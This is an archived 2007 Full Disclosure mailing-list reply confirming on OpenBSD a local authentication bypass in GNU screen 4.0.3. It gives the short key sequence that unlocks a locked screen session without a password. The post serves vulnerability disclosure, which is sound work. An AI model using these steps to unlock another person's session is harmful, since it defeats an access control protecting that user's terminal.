Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Full Disclosure: Re: screen 4.0.3 local Authentication Bypass

Re: screen 4.0.3 local Authentication Bypass

From: Pranay Kanwar <warl0ck_at_metaeye.org>
Date: Tue, 05 Jun 2007 05:58:39 +0530

Hi,

Verified on OpenBSD

$ uname -a
OpenBSD drake 4.1 GENERIC#172 i386
$ pkg_info screen
Information for inst:screen-4.0.3p0

Comment:
multi-screen window manager
------output snipped------

$screen
Then pressing space-bar to continue

Locking the screen with C-a C-x.

Pressing Ctrl+C

Key:
Getpass error
$

The screen gets unlocked without entering a password.

Regards

warl0ck // MSG
http://www.metaeye.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Jun 04 2007

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]